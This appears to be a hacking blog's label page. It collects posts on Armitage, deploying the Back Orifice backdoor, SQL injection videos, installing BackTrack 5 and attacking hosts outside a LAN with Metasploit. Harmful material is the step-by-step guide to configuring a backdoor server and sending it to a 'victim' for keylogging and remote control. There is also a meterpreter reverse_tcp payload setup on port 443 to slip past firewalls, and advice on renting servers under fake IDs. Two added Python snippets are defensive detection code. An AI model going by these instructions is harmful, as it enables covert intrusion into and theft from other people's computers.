
Showing posts with label Pro Hacking. Show all posts

Saturday, March 10, 2012

Armitage : Graphical Cyber Attack Management Tool

Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Armitage organizes Metasploit’s capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver.

For discovery, Armitage exposes several of Metasploit’s host management features. You can import hosts and launch scans to populate a database of targets. Armitage also visualizes the database of targets–you’ll always know which hosts you’re working with and where you have sessions.

Armitage assists with remote exploitation–providing features to automatically recommend exploits and even run active checks so you know which exploits will work. If these options fail, you can use the Hail Mary approach and unleash db_autopwn against your target database.

Requirements

To use Armitage, you need the following:
  • Linux or Windows
  • Java 1.6+
  • Metasploit Framework 3.5+
  • A configured database. Make sure you know the username, password, and host.

Download

Saturday, December 10, 2011

What is a Backdoor? How to Use a Backdoor

Using a backdoor, hackers can remotely access your computer without any authentication and do whatever they want. I will tell you some of the features; the rest you need to try and find out. These programs can:




  • Work as a key logger.
  • Send any Information from Victim’s PC to the Hacker’s PC.
  • Run any program on the Victims PC.
  • Display any Violating Image on victim’s Screen.
  • Open the CD Drive of the Victim’s PC.
  • Open any Web page on the Victims Screen.
  • Disable any Specific Key or whole Keyboard.
  • Shutdown Victim’s PC.
  • Start a song on the victim’s PC, etc.
The best backdoor I found is Back Orifice, so I am going to discuss it.

Back Orifice

Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but the threat is real. Back Orifice was created by the Cult of the Dead Cow group. Back Orifice is an open source program. The main threat of this software is that, by making some changes in the code, anybody can make it undetectable to the antivirus program running on the victim’s computer. Apart from the strange title, the program usually uses port 31337, a reference to the “leet” phenomenon popular among hackers.
  • Basics: Back Orifice consists of 2 main parts, the "client" and the "server".
  • The client is the part of Bo2k that you use to control the other party's comp. By default, it's bo2kgui.exe.
  • The server is the file you install on the other party's comp in order to control it. By default, it's bo2k.exe.
  • Never ever run bo2k.exe on your own comp unless you know what you are doing.
  • Another important component is plugins. To put it simply, plugins are add-ons for Bo2k. They enhance the power of Bo2k.
  • For a list of plugins for Bo2k, go to the Bo2k official site.
  • In order to control the other party's comp, you must first send the bo2k server to the other party, and once the other party runs it, you just start your bo2k client and use it to assert your control.

How to use Back Orifice ?

How to use it? First you must configure both the client and the server. Let's configure the server first.
  • Download a copy of Bo2k and unzip it.
  • Then run the file bo2kcfg.exe.
  • A window will appear welcoming you to the bo2k configuration wizard.
  • Click on Next. (Experts don't use the wizard, they configure it manually. But one thing at a time.)
  • Then the wizard will ask you for the bo2k server file (that's bo2k.exe).
  • By default you just need to click Next. However, if you renamed it or kept it in another folder, browse for it.
  • Now it will ask you if you want a TCPIO connection or a UDPIO connection. I would recommend TCPIO.
  • Now it will ask you what port you want it to listen on. More popular ones are 6666, 54321, 33137, 31336 and 4444. Try to avoid these. Try putting a number that you can remember easily. Avoid 12345, 1080, 8808.
  • Now it will ask you for your encryption type. Usually you only get to choose the XOR option. Do not choose 3DES if you are not in the US.
  • Now it will ask you what password you want to use. Choose one and remember it.
  • Then click Finish. The wizard will auto-configure the client part for you. Be patient, you can use it soon.
  • Now send the server part (bo2k.exe) to the other party, and when the other party runs it, you will be able to connect to it.

What to do when victim clicks on server ?

  • Start bo2kgui.exe.
  • Click on File, then New Server.
  • Type whatever name you want to call it.
  • Now type the IP address of the other party. If you don't know it, then you are out of luck.
  • If the other party is on IRC, just go to IRC and type /dns and you will get the IP (plz dun include the <> when typing /dns).
  • Now click on Connect. You should see a window saying "Retriving server capability. Please wait.."
  • However, if you see "Cannot connect to Remote server", that means the other party either did not run bo2k.exe, or he is behind a firewall, or maybe he has gone offline. Then you are out of luck. :)
  • Once you have connected, you should see some folders in the right window. I will explain the functions inside the folders in the next post.

Download Back Orifice 2000

  • Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/

How do I delete Back orifice 2000

Removing Back Orifice 2000 may require that you change the registry settings. To remove it in 7 simple steps, refer to the diagram below.
  • Click Start > Run, and type “Regedit” (without the quotes).
  • Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • Now look in the right box for the entry: umgr32 = "c:\windows\system\umgr32.exe"
  • Right-click on this entry and click Remove. Now restart your computer.
  • After restarting, open only Windows Explorer. Make sure you can see all registered extensions. To do so, select “View Options” and configure the appropriate settings.
  • Go to the WINDOWS\SYSTEM directory and find the “umgr32.exe” file. Once you find it, delete it.
  • Exit Windows Explorer and reboot again.
NOTE : Only for educational purposes. If I get a good response to it, I will further explain the functions of the folders and also how to add plugins to it. So give your comments if you like it !!!
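
For checking many machines against the removal steps above, the same registry test can be run over an exported .reg file. This is an added example, not code from the original post or from the Bo2k project; the sample export and the names `audit_runservices` and `KNOWN_BAD` are constructed for illustration. Because the post notes that the server file can be renamed, it returns every RunServices entry for review and flags only the file name given above.

```python
import ntpath
import re

# Autorun key named in the removal steps (registry key names are case-insensitive).
RUNSERVICES = r"hkey_local_machine\software\microsoft\windows\currentversion\runservices"
# File name the removal steps say to look for; extend with your own indicators.
KNOWN_BAD = {"umgr32.exe"}
# One string value line of a .reg export: "name"="data", with \\ and \" escapes.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

def unescape(text):
    """Undo .reg escaping (backslash before a backslash or a quote)."""
    return re.sub(r"\\(.)", r"\1", text)

def audit_runservices(reg_text):
    """Return (value name, command, flagged) for each RunServices string value."""
    findings, in_key = [], False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == RUNSERVICES
            continue
        match = VALUE_RE.match(line) if in_key else None
        if match is None:
            continue
        name, command = unescape(match.group(1)), unescape(match.group(2))
        # Executable file name without directory or trailing arguments.
        parts = ntpath.basename(command.strip('"')).split()
        exe = parts[0].lower() if parts else ""
        findings.append((name, command, exe in KNOWN_BAD))
    return findings

# Constructed sample export, not taken from a real machine.
SAMPLE_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"umgr32"="c:\\windows\\system\\umgr32.exe"
"SchedulingAgent"="mstask.exe"
'''

if __name__ == "__main__":
    for name, command, flagged in audit_runservices(SAMPLE_REG):
        print("FLAG  " if flagged else "review", name, "->", command)
```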

Sunday, October 30, 2011

Hack website completely using SQL Injection - Video Tutorial

I have posted a complete tutorial about How to Hack Websites using SQL Injection. But many guys are having problems using SQL, so here's a video tutorial in which I have hacked a website completely using SQL Injection. Just follow these simple steps and hack that site. If you have any problem, ask in the comments. Make sure to write the code as it is; in particular, take care with spaces, as it is really confusing where we have to add a space and where we don't.

Hack website completely using SQL Injection - Part 1

  • First part of Video Tutorial :


Hack website completely using SQL Injection - Part 2

  • Second part of Video Tutorial :


NOTE : This tutorial is only for educational purposes and the team of HWS is not responsible in any way for how this information is used, use it at your own risk.

Thursday, October 13, 2011

How to Install BACKTRACK 5 and Manually Specify Partitions Using It

Hello guys ... how are ya ??? wat ??? i didnt hear you !!! .. sorry i cant get u .. comment below ...:D
U must have heard a name BACKTRACK , ( who m i kidding :P ). Anyway i was discussing with xeo to make a thread on backtrack ... he said it wud be awesome . I have been using backtrack 5 for a while and thought i should share with you guys...
well i am a learner so feel free to correct my mistakes :)
M not gonna say wat is backtrack :P ... in this post i'll show u a way to install backtrack 5 r1 on your pc , more on backtrack in later posts...

Download Backtrack 5 r1

  • First of all download backtrack 5 r1 .
  • Select the specification according to your PC. I am using the GNOME flavor, so I would recommend that one because I find it less complicated. Select ISO or VMWARE.
  • ISO : if you want to make a DVD (plz plz do this).
  • VMWARE : if you want to run it on VMware ( :-( ).
>> Select torrent, it would be easy ...
anyway you know how to download a file :P .

Make a DVD

I highly recommend you make a DVD, because BackTrack is great for hacking and you'll need it in the future too. Suppose BackTrack crashes .. then what will you do ?? So make a DVD.
Burn it at 3x, otherwise it won't work.

Installing Backtrack 

After you have made the DVD, boot your PC with it and follow these steps:
  • Boot the live CD and select the first option as in the picture above.
  • Then a command line or shell will start.
  • Log in with root as the login ID and toor as the password. Ya, toor is the default password :P
  • Then, to start the GUI, type startx and hit Enter.
Now you should be in a GUI with an install.sh file (or something like that) on the desktop. Run it.
It will start the installation procedure.
You will be asked to specify a partition for installation. There are three ways to do it:
  1. By using entire disk : this will format your whole hard disk and install BackTrack.
  2. Automatically side by side : this option will create partitions automatically and will install BackTrack alongside the other OS present on your system.
  3. Advanced : in this you have to do it manually. This is a little tricky; follow the steps below.

Manually Specifying Partitions

Follow these Steps :
  • Select Manual as the partition method.
  • In next window select any drive with free space
  • With the free space line selected, click on the Add button. 
  • In the new window, type the size of your RAM in the New partition size in megabytes field and select the swap area option from the Use as: drop down list.
  • Click the OK button and, in a few seconds, you'll notice a "swap" line with the specified size.
  • With the "free space" line selected, click on the "Add" button. In the new window, select the "Primary" option, type a value between 10,000 and 50,000 (the space you want BackTrack to use) in the "New partition size in megabytes" field and select / as the "Mount point."
  • Click the OK button and, in a few seconds, you'll notice an ext4 / line with the specified size.
  • With the "free space" line selected, click on the "Add" button. In the new window, select boot as the mount point and allocate about 150 MB to it.
  • Now click the forward button to install it.

DONE

Now you must have doubts , feel free to ask.
I'll continue this only if u show interest , i have some really cool stuffs on backtrack. so plz comment on the post. A comment from you too is required xeo .

HOPE THIS WAS INFORMATIVE FOR YOU , THANK YOU.

Copyright © 2011. All rights reserved by “Kumar Sourav" and "xeo hacker"

Monday, October 3, 2011

How to do Hacking the WAN Internet Using Metasploit

A few days ago someone left a message through the contact form on this website asking, "Is it possible to do hacking outside the LAN (Local Area Network)?" If you look at all of my articles, 80% of the hacking articles were written for the Local Area Network, because I work in my own lab. So how about hacking outside the Local Area Network? Of course, it follows the same logic as attacking from inside the Local Area Network.

Requirement

Step-By-Step

  • Okay, let's start with the Virtual Private Server (VPS). This kind of server gives you the freedom to install any software you want on a virtualized machine, because this hosting type gives you the flexibility to manage your server yourself (DIY).

  • A Dedicated Server does almost the same as a VPS (Virtual Private Server), but usually you have your own machine and you put it in a data center (or the service provider rents you their machine). This hosting type also allows you as the user to manage your system yourself. You can do anything to your server and install anything you want on it.

  • Cloud server –> I haven't tried this… maybe someone can share.

  • You have internet with a public IP address… usually when you subscribe to 1:1 internet bandwidth, they also give you 1 public IP.

  • Control the router ourselves to redirect incoming or outgoing connections.
    Before we continue to the next step, let's see the figure below (I will try to explain it in a simple way).

  • Legends (Attacker) :
    - Attacker1 uses local IP address –> 192.168.8.8
    - Attacker1 has public IP address –> 73.67.123.85
    - Attacker1 can control his router to redirect any incoming/outgoing traffic.
    - Attacker2 uses a VPS/Dedicated/Cloud server, connected directly to the internet, to do an attack.

  • Legends (Victim) :
    - Victim1 has local IP address –> 192.168.1.2
    - Victim2 is connected to the internet via router+firewall; this firewall only allows ports 80 and 443 for outgoing connections
    - Victim2 is connected directly to the internet with IP address –> 98.87.112.89

How to Attack?

  • Actually, for the network topology I drew above the attack method is almost the same; you should know the typical rules an administrator uses when setting up a firewall (in this case, the network administrator who administers the router for victim1).

  • AFAIK they usually open specific ports like :

  • TCP 80 (Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing websites

  • TCP 443 (Secure Socket Layer – SSL) –> Secure HTTP connection, usually called HTTPS
    etc. (you can scan it first, but be careful).

  • From the information above, an attacker can usually create a payload with options like this :
    set payload windows/meterpreter/reverse_tcp
    set lhost 73.67.123.85
    set lport 443

  • When the attack launches successfully, the payload will try to connect to IP address 73.67.123.85 on port 443. The attacker uses port 443 because he knows that the victim1 firewall only allows ports 80 and 443 for outgoing connections. If you configure the payload with another port, the victim1 firewall will drop every packet that tries to leave on any port other than 80 and 443. For the next step, the attacker should configure his router to redirect all incoming traffic on port 443 to his local IP address 192.168.8.8.

  • You can see the tutorial with an example of port forwarding on a WRT54G router here. Actually, all routers will have the same option for port forwarding.

  • Oops… I almost forgot to explain how to do that from a VPS/Dedicated/Cloud server….
    Actually, from a VPS/Dedicated/Cloud server it will be easier and also safer (maybe..LoL), because a lot of hackers use this kind of service… they buy it using a fake ID (hit and run) and then perform an attack from the server. The logic is almost the same as what I've already explained above.

  • You should remember that every action triggers consequences, whether good or bad. When you do something, you should know every consequence you will face later. Be wise.
Hope it's useful for you.
If information I wrote here was wrong, let me know I'll correct it
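
The firewall rule described above filters on port number only, so it cannot tell HTTPS from any other TCP stream sent to port 443. The following added example (not part of the original post) shows the check a defender can apply at the egress point: compare the first bytes the client sends with the protocol expected on each allowed port. The flow records, the third-party addresses and the function names are constructed for illustration.

```python
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ",
                b"OPTIONS ", b"CONNECT ")

def is_tls_client_hello(data: bytes) -> bool:
    """True if the first client bytes form a TLS record carrying a ClientHello."""
    if len(data) < 6:
        return False
    record_len = int.from_bytes(data[3:5], "big")
    return (data[0] == 0x16                 # record type: handshake
            and data[1] == 0x03 and data[2] <= 0x04
            and 0 < record_len <= 16384     # TLS plaintext record size limit
            and data[5] == 0x01)            # handshake type: ClientHello

def is_http_request(data: bytes) -> bool:
    """True if the first client bytes start with a common HTTP method."""
    return data.startswith(HTTP_METHODS)

# Protocol expected on each port the firewall in the text allows outbound.
EXPECTED = {443: is_tls_client_hello, 80: is_http_request}

def audit_egress(flows):
    """Return (src, dst, port) for flows whose first bytes do not fit the port."""
    suspicious = []
    for src, dst, dport, first_bytes in flows:
        check = EXPECTED.get(dport)
        if check is not None and not check(first_bytes):
            suspicious.append((src, dst, dport))
    return suspicious

# Constructed flow records: (source, destination, port, first client bytes).
FLOWS = [
    ("192.168.1.2", "203.0.113.10", 443,
     bytes.fromhex("16030100c8010000c40303")),            # TLS ClientHello
    ("192.168.1.2", "203.0.113.10", 80, b"GET /index.html HTTP/1.1\r\n"),
    ("192.168.1.2", "73.67.123.85", 443, b""),            # no handshake sent
    ("192.168.1.2", "203.0.113.77", 443, b"\x00\x00\x01\x00AAAA"),
]

if __name__ == "__main__":
    for src, dst, dport in audit_egress(FLOWS):
        print(f"non-matching protocol on allowed port: {src} -> {dst}:{dport}")
```

A flagged flow is a lead for investigation rather than proof of compromise; some legitimate software also sends non-TLS traffic to port 443.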
